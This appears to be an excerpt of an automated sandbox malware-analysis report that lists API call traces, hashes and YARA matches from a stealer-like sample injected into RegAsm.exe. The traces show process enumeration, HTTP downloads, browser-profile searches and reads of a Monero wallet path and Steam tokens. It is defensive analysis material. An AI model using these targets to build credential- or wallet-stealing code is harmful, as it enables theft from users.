                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: Virtual$AllocInfoSystem$Free
                                                                            • String ID:
                                                                            • API String ID: 4191843772-0
                                                                            • Opcode ID: cbc0b3ac0dd6c7632f84ec0c944eb9480f917d19491a2713eb1c4f9d20d1458c
                                                                            • Instruction ID: 60f21c85aeb019d5848d221ca7b1e7ce2efbc21e33a6eafe329d22d99e633b92
                                                                            • Opcode Fuzzy Hash: cbc0b3ac0dd6c7632f84ec0c944eb9480f917d19491a2713eb1c4f9d20d1458c
                                                                            • Instruction Fuzzy Hash: 8F21F935741614BBDB04AEB9DCD4BAE73B9BB46704F50852AF903A7B40FB705C048794
                                                                            APIs
                                                                            • _EH_prolog.MSVCRT ref: 004102C8
                                                                              • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00410303
                                                                            • Process32First.KERNEL32(00000000,00000128), ref: 00410314
                                                                            • Process32Next.KERNEL32(?,00000128), ref: 0041037C
                                                                            • CloseHandle.KERNEL32(?,?,00000000), ref: 00410389
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2467141925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Process32$CloseCreateFirstH_prologHandleNextSnapshotToolhelp32lstrcpy
                                                                            • String ID:
                                                                            • API String ID: 599723951-0
                                                                            • Opcode ID: 2fc1f2962bdb036bcc7fb993ace66804accd746089eb9d5784e12931c34da8f2
                                                                            • Instruction ID: a4a97019f206722b2e8740589aebd7bc91867f573d1150960a86d602fc248a9b
                                                                            • Opcode Fuzzy Hash: 2fc1f2962bdb036bcc7fb993ace66804accd746089eb9d5784e12931c34da8f2
                                                                            • Instruction Fuzzy Hash: 23210CB1A00118EBCB10EFA5CD55AEEBBB9AF58348F50407EE405F3691CB785A488B65
                                                                            APIs
                                                                            • memset.MSVCRT ref: 004024F0
                                                                              • Part of subcall function 0040245C: memset.MSVCRT ref: 00402481
                                                                              • Part of subcall function 0040245C: CryptStringToBinaryA.CRYPT32(00000104,00000000,00000001,00000000,?,00000000,00000000), ref: 004024A7
                                                                              • Part of subcall function 0040245C: CryptStringToBinaryA.CRYPT32(00000104,00000000,00000001,?,?,00000000,00000000), ref: 004024C1
                                                                            • strcat.MSVCRT(?,00000000,?,?,00000000,00000104), ref: 00402505
                                                                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00402510
                                                                            • RtlAllocateHeap.NTDLL(00000000), ref: 00402517
                                                                              • Part of subcall function 00402308: ??_U@YAPAXI@Z.MSVCRT ref: 0040238D
                                                                            • memset.MSVCRT ref: 00402540
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2467141925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: memset$BinaryCryptHeapString$AllocateProcessstrcat
                                                                            • String ID:
                                                                            • API String ID: 3248666761-0
                                                                            • Opcode ID: a641902682074bfb60fea3bc3b21c2ff598bd00ccde1354f0615c18b64d23653
                                                                            • Instruction ID: 5936fd312f401cb4099e43ed518250dd8d8a99da873d70e406837ce1c28814d2
                                                                            • Opcode Fuzzy Hash: a641902682074bfb60fea3bc3b21c2ff598bd00ccde1354f0615c18b64d23653
                                                                            • Instruction Fuzzy Hash: BCF044B6C0021CB7CB10BBA4DD49FCA777C9F14304F0000A6BA45F2081DAB497C4CBA4
                                                                            APIs
                                                                            • _EH_prolog.MSVCRT ref: 0040D6C0
                                                                              • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                            • StrCmpCA.SHLWAPI(00000000,Opera GX,00425BC6,00425BC3,?,?,?), ref: 0040D70A
                                                                              • Part of subcall function 00410D21: SHGetFolderPathA.SHELL32(00000000,;\B,00000000,00000000,?), ref: 00410D52
                                                                              • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                              • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                              • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                              • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                              • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                              • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426AC0,?,00000000,0042656F), ref: 0040FAC9
                                                                              • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                              • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                              • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                              • Part of subcall function 00410CDD: _EH_prolog.MSVCRT ref: 00410CE2
                                                                              • Part of subcall function 00410CDD: GetFileAttributesA.KERNEL32(00000000,?,0040BAC2,?,00425BF6,?,?), ref: 00410CF6
                                                                              • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                              • Part of subcall function 0040A893: _EH_prolog.MSVCRT ref: 0040A898
                                                                            Strings
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: H_prolog$lstrcpy$lstrcat$AttributesFileFolderPathlstrlen
                                                                            • String ID: #$Opera GX
                                                                            • API String ID: 2625060131-1046280356
                                                                            • Opcode ID: 0d52e54730dc141048d375f83ad8129c69a5083a6e3fd02f50115e121cba97ed
                                                                            • Instruction ID: 6c82463e2676cb38e72d52ba03d9db1ff071c52b99602dbfe09bc28b63ea1fae
                                                                            • Opcode Fuzzy Hash: 0d52e54730dc141048d375f83ad8129c69a5083a6e3fd02f50115e121cba97ed
                                                                            • Instruction Fuzzy Hash: 2A028C7190424CEADF14EBE5D956BDEBBB8AF19308F50417EE405732C2DA781B0C8B66
                                                                            APIs
                                                                            • _EH_prolog.MSVCRT ref: 0041332B
                                                                            • lstrlenA.KERNEL32(00000000), ref: 00413348
                                                                            • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0041340C
                                                                            Strings
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: H_prologlstrlen
                                                                            • String ID: ERROR
                                                                            • API String ID: 2133942097-2861137601
                                                                            • Opcode ID: 457c7dca167f6097eb3decf56045153080dc014ab3c7bbf54f3f61cdd9435eba
                                                                            • Instruction ID: 77545b96f9c55e0de6ec71263cb7e0cfa71b0ad252d2fb84a837ede919fdf13f
                                                                            • Opcode Fuzzy Hash: 457c7dca167f6097eb3decf56045153080dc014ab3c7bbf54f3f61cdd9435eba
                                                                            • Instruction Fuzzy Hash: 133172B1900148AFCB00EFA9D956BDD7FB4AB15304F10803EF405A7282DB389648CBA9
                                                                            APIs
                                                                            • _EH_prolog.MSVCRT ref: 0041303F
                                                                              • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                              • Part of subcall function 00404F2A: _EH_prolog.MSVCRT ref: 00404F2F
                                                                              • Part of subcall function 00404F2A: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404F92
                                                                              • Part of subcall function 00404F2A: StrCmpCA.SHLWAPI(?), ref: 00404FA6
                                                                              • Part of subcall function 00404F2A: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00404FC9
                                                                              • Part of subcall function 00404F2A: HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00404FFF
                                                                              • Part of subcall function 00404F2A: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405023
                                                                              • Part of subcall function 00404F2A: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040502E
                                                                              • Part of subcall function 00404F2A: HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 0040504C
                                                                            • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 0041309D
                                                                            Strings
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: HttpInternet$H_prologOpenRequest$ConnectInfoOptionQuerySendlstrcpy
                                                                            • String ID: ERROR$ERROR
                                                                            • API String ID: 1120091252-2579291623
                                                                            • Opcode ID: aefbf7741ce3e4e0e52d37c23a8d594d106d3e01a68b0f1fcaa8373cdeccc4c0
                                                                            • Instruction ID: 9cf05e6fcab295474e65acada3454b7dde9d8d835f49f967da0029279a9dc82d
                                                                            • Opcode Fuzzy Hash: aefbf7741ce3e4e0e52d37c23a8d594d106d3e01a68b0f1fcaa8373cdeccc4c0
                                                                            • Instruction Fuzzy Hash: FC210EB0900189EADB14FFA5C556BDDBBF4AF18348F50417EE80563682DB785B0CCB66
                                                                            APIs
                                                                            • OpenProcess.KERNEL32(00000410,00000000,2IA), ref: 00411019
                                                                            • K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00411034
                                                                            • CloseHandle.KERNEL32(00000000), ref: 0041103B
                                                                            Strings
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseFileHandleModuleNameOpenProcess
                                                                            • String ID: 2IA
                                                                            • API String ID: 3183270410-4174278054
                                                                            • Opcode ID: 30d4ffeda736fd64e0374663d8f4d70df638ccef9048597482ecb454b1010210
                                                                            • Instruction ID: 8552e384592846dc61b773d54a0908cfb1ecd9fdbc452b9aa5e823a114c6ff4c
                                                                            • Opcode Fuzzy Hash: 30d4ffeda736fd64e0374663d8f4d70df638ccef9048597482ecb454b1010210
                                                                            • Instruction Fuzzy Hash: 85F03079905228BBEB60AB90DC49FDD3B78AB09715F000061BE85A61D0DBB4AAC4CBD4
                                                                            APIs
                                                                            • _EH_prolog.MSVCRT ref: 0041443C
                                                                              • Part of subcall function 00413460: _EH_prolog.MSVCRT ref: 00413465
                                                                            • Sleep.KERNEL32(000003E8,?,?,?,?,?,00000000), ref: 004144C0
                                                                            • CreateThread.KERNEL32(00000000,00000000,00413326,?,00000000,00000000), ref: 004144E2
                                                                            • WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 004144EA
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: H_prolog$CreateObjectSingleSleepThreadWait
                                                                            • String ID:
                                                                            • API String ID: 2678630583-0
                                                                            • Opcode ID: fb7f86a4d038d58da3621eb36abdba5b43a6fdb478c7a05049313af6d209da56
                                                                            • Instruction ID: 90c6c212f9a98d1f3efa3e19a0f967dde8f702bf728512cfd2e6caf086527d46
                                                                            • Opcode Fuzzy Hash: fb7f86a4d038d58da3621eb36abdba5b43a6fdb478c7a05049313af6d209da56
                                                                            • Instruction Fuzzy Hash: 3E311E75900148AFCB11DFA4C995ADEBBB8FF18304F50412FF906A7281DB789B88CB95
                                                                            APIs
                                                                            • GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00401CA7,80000001,SOFTWARE\monero-project\monero-core,wallet_path,?,00000000), ref: 00401014
                                                                            • HeapAlloc.KERNEL32(00000000,?,?,?,00401CA7,80000001,SOFTWARE\monero-project\monero-core,wallet_path,?,00000000), ref: 0040101B
                                                                            • RegOpenKeyExA.KERNEL32(000000FF,00000000,00000000,00020119,?,?,?,?,00401CA7,80000001,SOFTWARE\monero-project\monero-core,wallet_path,?,00000000), ref: 00401034
                                                                            • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,000000FF,?,?,?,00401CA7,80000001,SOFTWARE\monero-project\monero-core,wallet_path,?,00000000), ref: 0040104D
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Heap$AllocOpenProcessQueryValue
                                                                            • String ID:
                                                                            • API String ID: 3676486918-0
                                                                            • Opcode ID: a27f42a190018756939c2a186fac89ee64236d1eb1bb3ceecf19bf94991bf119
                                                                            • Instruction ID: 832c21bd40a73018163515ce5beef45c93da2aa0da3d8997035a91abaf75a422
                                                                            • Opcode Fuzzy Hash: a27f42a190018756939c2a186fac89ee64236d1eb1bb3ceecf19bf94991bf119
                                                                            • Instruction Fuzzy Hash: E2F03A79240208FFEB119F91DC0AFAE7B7AEB45B40F104025FB01AA1A0D7B19A109B24
                                                                            APIs
                                                                            • GetProcessHeap.KERNEL32(00000000,00000104,00000001,?,?,?,00414F3C,00000000,?,Processor: ,00000000,?,[Hardware],00000000,?,0042667C), ref: 0040FE2C
                                                                            • HeapAlloc.KERNEL32(00000000,?,?,?,00414F3C,00000000,?,Processor: ,00000000,?,[Hardware],00000000,?,0042667C,00000000,?), ref: 0040FE33
                                                                            • RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00000000,?,?,?,00414F3C,00000000,?,Processor: ,00000000,?,[Hardware],00000000,?), ref: 0040FE51
                                                                            • RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,000000FF,?,?,?,00414F3C,00000000,?,Processor: ,00000000,?,[Hardware],00000000), ref: 0040FE6D
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Heap$AllocOpenProcessQueryValue
                                                                            • String ID:
                                                                            • API String ID: 3676486918-0
                                                                            • Opcode ID: 5a348dce4926add7b50cf3e1a3237f7deaf910ff3e5a2bc42b85e6f6daaeb5b6
                                                                            • Instruction ID: c6a06fe1a5752460b6d2ee94bc9516a9de2a98ba0b24791e6944b9a77995073e
                                                                            • Opcode Fuzzy Hash: 5a348dce4926add7b50cf3e1a3237f7deaf910ff3e5a2bc42b85e6f6daaeb5b6
                                                                            • Instruction Fuzzy Hash: 11F05E7A240214FFFB209BD1DD0EFAA7A7EEB45B04F101035FB01A61A1D7B05900DB64
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2467141925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 6%@$6%@
                                                                            • API String ID: 0-3369382886
                                                                            • Opcode ID: 1671fecbb1ebbe02e7eb2cc7cf41ad1b7ad139c209bd50c1cd2ae32b560b646f
                                                                            • Instruction ID: badd9bf96c2c88f43ed760c6ea304aae97d5f1f2e5982ea7d2ae84e0ed7fb19c
                                                                            • Opcode Fuzzy Hash: 1671fecbb1ebbe02e7eb2cc7cf41ad1b7ad139c209bd50c1cd2ae32b560b646f
                                                                            • Instruction Fuzzy Hash: 9C4146716001199FCB01CF69D8806EDBBB1FF89318F1484BADC55EB395C3B8A982CB54
                                                                            APIs
                                                                            • _EH_prolog.MSVCRT ref: 0041453D
                                                                              • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                              • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                              • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426AC0,?,00000000,0042656F), ref: 0040FAC9
                                                                              • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                              • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                              • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                            • lstrlenA.KERNEL32(00000000,00000000,?,00000000,0042655B), ref: 0041458E
                                                                              • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                              • Part of subcall function 00414437: _EH_prolog.MSVCRT ref: 0041443C
                                                                              • Part of subcall function 00414437: CreateThread.KERNEL32(00000000,00000000,00413326,?,00000000,00000000), ref: 004144E2
                                                                              • Part of subcall function 00414437: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 004144EA
                                                                              • Part of subcall function 00401061: _EH_prolog.MSVCRT ref: 00401066
                                                                            Strings
                                                                            • Soft\Steam\steam_tokens.txt, xrefs: 004145A6
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2467141925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: H_prolog$lstrcpy$lstrlen$CreateObjectSingleThreadWaitlstrcat
                                                                            • String ID: Soft\Steam\steam_tokens.txt
                                                                            • API String ID: 40794102-3507145866
                                                                            • Opcode ID: 5dea421be7ed3263a5a25ba242280bcfb85689912c92a282fb01fad9efacc230
                                                                            • Instruction ID: 1e33fb55044e108cdc823b8717a6e4474b59c1838e8e2ba6a3b9a54ee3721495
                                                                            • Opcode Fuzzy Hash: 5dea421be7ed3263a5a25ba242280bcfb85689912c92a282fb01fad9efacc230
                                                                            • Instruction Fuzzy Hash: 61215B71C00148AACB14FBE5C966BDDBB74AF18308F50817EE411725D2DB78174CCA66
                                                                            APIs
                                                                            • _EH_prolog.MSVCRT ref: 004165DE
                                                                              • Part of subcall function 00410D21: SHGetFolderPathA.SHELL32(00000000,;\B,00000000,00000000,?), ref: 00410D52
                                                                            • lstrcat.KERNEL32(?,00000000), ref: 00416620
                                                                            • lstrcat.KERNEL32(?), ref: 0041663F
                                                                              • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                              • Part of subcall function 004162AF: _EH_prolog.MSVCRT ref: 004162B4
                                                                              • Part of subcall function 004162AF: wsprintfA.USER32 ref: 004162D4
                                                                              • Part of subcall function 004162AF: FindFirstFileA.KERNEL32(?,?), ref: 004162EB
                                                                              • Part of subcall function 004162AF: StrCmpCA.SHLWAPI(?,004268B0), ref: 00416308
                                                                              • Part of subcall function 004162AF: StrCmpCA.SHLWAPI(?,004268B4), ref: 00416322
                                                                              • Part of subcall function 004162AF: wsprintfA.USER32 ref: 00416346
                                                                              • Part of subcall function 004162AF: StrCmpCA.SHLWAPI(?,00426525), ref: 00416357
                                                                              • Part of subcall function 004162AF: wsprintfA.USER32 ref: 00416374
                                                                              • Part of subcall function 004162AF: PathMatchSpecA.SHLWAPI(?,?), ref: 0041639B
                                                                              • Part of subcall function 004162AF: lstrcat.KERNEL32(?,?), ref: 004163C7
                                                                              • Part of subcall function 004162AF: lstrcat.KERNEL32(?,004268CC), ref: 004163D9
                                                                              • Part of subcall function 004162AF: lstrcat.KERNEL32(?,?), ref: 004163E9
                                                                              • Part of subcall function 004162AF: lstrcat.KERNEL32(?,004268D0), ref: 004163FB
                                                                              • Part of subcall function 004162AF: lstrcat.KERNEL32(?,?), ref: 0041640F
                                                                              • Part of subcall function 004162AF: wsprintfA.USER32 ref: 00416388
                                                                              • Part of subcall function 004162AF: FindNextFileA.KERNEL32(00000000,?), ref: 004165AA
                                                                              • Part of subcall function 004162AF: FindClose.KERNEL32(00000000), ref: 004165B9
                                                                              • Part of subcall function 00401061: _EH_prolog.MSVCRT ref: 00401066
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2467141925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: lstrcat$H_prologwsprintf$Find$FilePath$CloseFirstFolderMatchNextSpec
                                                                            • String ID:
                                                                            • API String ID: 25485560-0
                                                                            • Opcode ID: 6a69f1f2ed3b177ebeb85c1869a8abb099c5e14ffe340268730b21adc0a832aa
                                                                            • Instruction ID: 6e5b766fc683c4e74d5122aabce2b8c3392ef196e7b74699665c3906b53d7570
                                                                            • Opcode Fuzzy Hash: 6a69f1f2ed3b177ebeb85c1869a8abb099c5e14ffe340268730b21adc0a832aa
                                                                            • Instruction Fuzzy Hash: 5A41AD7194022DABCF10EBF0EC13DED7B79AB18314F00466AF844A2192E77997958B96
                                                                            APIs
                                                                            • ?Startup@TimeStamp@mozilla@@SAXXZ.MOZGLUE ref: 6CC33095
                                                                              • Part of subcall function 6CC335A0: InitializeCriticalSectionAndSpinCount.KERNEL32(6CCBF688,00001000), ref: 6CC335D5
                                                                              • Part of subcall function 6CC335A0: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6CC335E0
                                                                              • Part of subcall function 6CC335A0: QueryPerformanceFrequency.KERNEL32(?), ref: 6CC335FD
                                                                              • Part of subcall function 6CC335A0: _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6CC3363F
                                                                              • Part of subcall function 6CC335A0: GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6CC3369F
                                                                              • Part of subcall function 6CC335A0: __aulldiv.LIBCMT ref: 6CC336E4
                                                                            • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6CC3309F
                                                                              • Part of subcall function 6CC55B50: QueryPerformanceCounter.KERNEL32(?,?,?,?,6CC556EE,?,00000001), ref: 6CC55B85
                                                                              • Part of subcall function 6CC55B50: EnterCriticalSection.KERNEL32(6CCBF688,?,?,?,6CC556EE,?,00000001), ref: 6CC55B90
                                                                              • Part of subcall function 6CC55B50: LeaveCriticalSection.KERNEL32(6CCBF688,?,?,?,6CC556EE,?,00000001), ref: 6CC55BD8
                                                                              • Part of subcall function 6CC55B50: GetTickCount64.KERNEL32 ref: 6CC55BE4
                                                                            • ?InitializeUptime@mozilla@@YAXXZ.MOZGLUE ref: 6CC330BE
                                                                              • Part of subcall function 6CC330F0: QueryUnbiasedInterruptTime.KERNEL32 ref: 6CC33127
                                                                              • Part of subcall function 6CC330F0: __aulldiv.LIBCMT ref: 6CC33140
                                                                              • Part of subcall function 6CC6AB2A: __onexit.LIBCMT ref: 6CC6AB30
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: Time$CriticalQuerySection$InitializePerformanceStamp@mozilla@@__aulldiv$AdjustmentCountCount64CounterEnterFrequencyInterruptLeaveNow@SpinStartup@SystemTickUnbiasedUptime@mozilla@@V12@___onexit_strnicmpgetenv
                                                                            • String ID:
                                                                            • API String ID: 4291168024-0
                                                                            • Opcode ID: 07c4669e924b16a431b55ed6b94c865e92857ddd96191e44ecd686c4bebf0f38
                                                                            • Instruction ID: 4138aa6dcedeec23922773e152800c6dd72218e3c0fb0f0fc5209c502e6b804a
                                                                            • Opcode Fuzzy Hash: 07c4669e924b16a431b55ed6b94c865e92857ddd96191e44ecd686c4bebf0f38
                                                                            • Instruction Fuzzy Hash: 70F02D2AE207499BCB10DFB899811E67374AF6B114F501319EC8853711FF30A1D983C9
                                                                            APIs
                                                                            • _EH_prolog.MSVCRT ref: 00411EBD
                                                                              • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                              • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                              • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                              • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                              • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                              • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426AC0,?,00000000,0042656F), ref: 0040FAC9
                                                                              • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                              • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                              • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                              • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                              • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                              • Part of subcall function 00404DCA: _EH_prolog.MSVCRT ref: 00404DCF
                                                                              • Part of subcall function 00404DCA: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404E1E
                                                                              • Part of subcall function 00404DCA: StrCmpCA.SHLWAPI(?), ref: 00404E38
                                                                              • Part of subcall function 00404DCA: InternetOpenUrlA.WININET(?,00000000,00000000,00000000,-00800100,00000000), ref: 00404E5C
                                                                              • Part of subcall function 00404DCA: CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00404E7D
                                                                              • Part of subcall function 00404DCA: InternetReadFile.WININET(00000000,?,00000400,00000000), ref: 00404EC8
                                                                              • Part of subcall function 00404DCA: CloseHandle.KERNEL32(?,?,00000400), ref: 00404EE2
                                                                              • Part of subcall function 00404DCA: InternetCloseHandle.WININET(00000000), ref: 00404EE9
                                                                              • Part of subcall function 00404DCA: InternetCloseHandle.WININET(?), ref: 00404EF2
                                                                              • Part of subcall function 00404DCA: WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00404EA4
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2467141925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: H_prologInternetlstrcpy$CloseFileHandle$Openlstrcat$CreateReadWritelstrlen
                                                                            • String ID: B
                                                                            • API String ID: 1244342732-1255198513
                                                                            APIs
                                                                            • _EH_prolog.MSVCRT ref: 0040B8B4
                                                                              • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                              • Part of subcall function 00410D21: SHGetFolderPathA.SHELL32(00000000,;\B,00000000,00000000,?), ref: 00410D52
                                                                              • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                              • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                              • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                              • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                              • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                              • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426AC0,?,00000000,0042656F), ref: 0040FAC9
                                                                              • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                              • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                              • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                              • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                              • Part of subcall function 0040B463: _EH_prolog.MSVCRT ref: 0040B468
                                                                              • Part of subcall function 0040B463: FindFirstFileA.KERNEL32(00000000,?,00000000,?,00425F10,?,?,00425BEF,?,00000000,?), ref: 0040B4E7
                                                                              • Part of subcall function 0040B463: StrCmpCA.SHLWAPI(?,00425F14,?,00000000,?), ref: 0040B50B
                                                                              • Part of subcall function 0040B463: StrCmpCA.SHLWAPI(?,00425F18,?,00000000,?), ref: 0040B525
                                                                              • Part of subcall function 0040B463: StrCmpCA.SHLWAPI(?,prefs.js,00000000,?,?,?,00425F1C,?,?,00425BF2,?,00000000,?), ref: 0040B5C1
                                                                              • Part of subcall function 00401061: _EH_prolog.MSVCRT ref: 00401066
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2467141925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: H_prolog$lstrcpy$lstrcat$FileFindFirstFolderPathlstrlen
                                                                            • String ID: \..\
                                                                            • API String ID: 271224408-4220915743
                                                                            Strings
                                                                            Memory Dump Source
